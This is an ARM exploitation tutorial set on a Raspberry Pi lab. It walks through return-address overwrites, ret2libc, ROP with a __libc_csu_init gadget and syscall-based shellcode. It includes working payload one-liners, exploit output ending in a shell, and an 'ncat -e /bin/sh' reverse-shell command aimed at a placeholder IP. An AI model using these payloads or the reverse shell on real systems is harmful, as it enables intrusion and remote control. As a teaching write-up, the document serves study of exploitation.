see this to set up your environment.
Use pattern.py to get the offset to the return-address.
./pattern.py create 30
./pattern.py offset string
It's just like the intel assemble, first the return-address(lr register) is pushed into stack, and then the frame pointer(r11). After ensure the offset, overwrite the return-address with donuts' address.
./test `python -c "print '1234567890123456\x9c\x04\x01\x00'"`
Turn off ASLR and get the address of system. And for some reasons, we don't need to set the argument, because r0 is not changed and we can make it point to a string including '/bin/sh;'.
./test `python -c "print "/bin/sh;##123456\x54\xb1\xe9\x76'"`
It's kind of like rop in x86_64, you just need to find some gagdets to set arguments: r0, r1, r2, r3(other arguments pused into stack) when calling a function, bp(r11) is not necessary to be pushed into stack sometimes, but lr must be pushed into stack. As for return value, function uses r0(if the value is 64bit, using r0 and r1, r1 for high 32bit, r0 for low 32bit). And we also have a powerful gadget in __libc_csu_init:
.text:000104F8 ADD R4, R4, #1
.text:000104FC LDR R3, [R5],#4
.text:00010500 MOV R2, R9
.text:00010504 MOV R1, R8
.text:00010508 MOV R0, R7
.text:0001050C BLX R3 ; frame_dummy
.text:00010510 CMP R6, R4
.text:00010514 BNE loc_104F8
.text:00010518 LDMFD SP!, {R4-R10,PC}
Surprised? yes, do as you've learned! Just see rop.py. And finally we got a shell.
pi@raspberrypi:~/arm_exploit/rop $ python rop.py
[!] Pwntools does not support 32-bit Python. Use a 64-bit release.
[+] Starting local process './rop': pid 17466
[*] '/home/pi/arm_exploit/rop/rop'
Arch: arm-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x10000)
[*] '/home/pi/arm_exploit/rop/libc.so.6'
Arch: arm-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
go
[+] write_addr: 0x76ea8140
[+] system_addr: 0x76e1e154
[*] Switching to interactive mode
$ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
And last let's have a look at how to write your shellcode in arm architechture. First thing I want to say is there is no cache incoherency in arm-arch when executing your shellcode, unlike mips. Syscall on x86 and arm:
x86 ARM(r0-r5)
eax = sysnum r7 = sysnum
ebx = arg1 r0 = arg1
ecx = arg2 r1 = arg2
edx = arg3 r2 = arg3
… …
int 0x80 svc #0x80 / svc #0
eax = ret-value r0 = ret-value
You can see the syscall numbers here. And the problem you face is NULL character. Just find some ways to overcome it. After you finished your shellcode, compile it:
gcc shellcode.s -o shellcode -nostdlib
Writing shellcode by yourself is a bit hard, so just find it on network. And another thing is that in thumb mode we can reduce the chance of having null-bytes by simply reducing the size of our instructions. So Try it as possible as you can.
There are 2 types of shellcode to get a shell: reverse shell and bind shell.
Reverse shell: connects to an IP address and port and provides shell access.
• socket - create a socket
• connect - connect to IP/PORT
• dup2 - redirect stderr
• dup2 - redirect stdout
• dup2 - redirect stdin
• execve - call /bin/sh
For example, run command on the target system as follow:
ncat -e /bin/sh yourip yourport
And listen on your own system:
nc -l -p yourport -vvv
Bind shell: Bind a socket to port and provides shell access.
• socket - create a socket
• bind - bind a socket to IP/PORT
• listen - listen on the created socket
• accept - accept incoming connection
• dup2 - redirect stderr
• dup2 - redirect stdout
• dup2 - redirect stdin
• execve - call /bin/sh
And we usually use bind shell.
Here is the shellcode of execve("/bin/sh", NULL, NULL). Here is the shellcode of bind shell.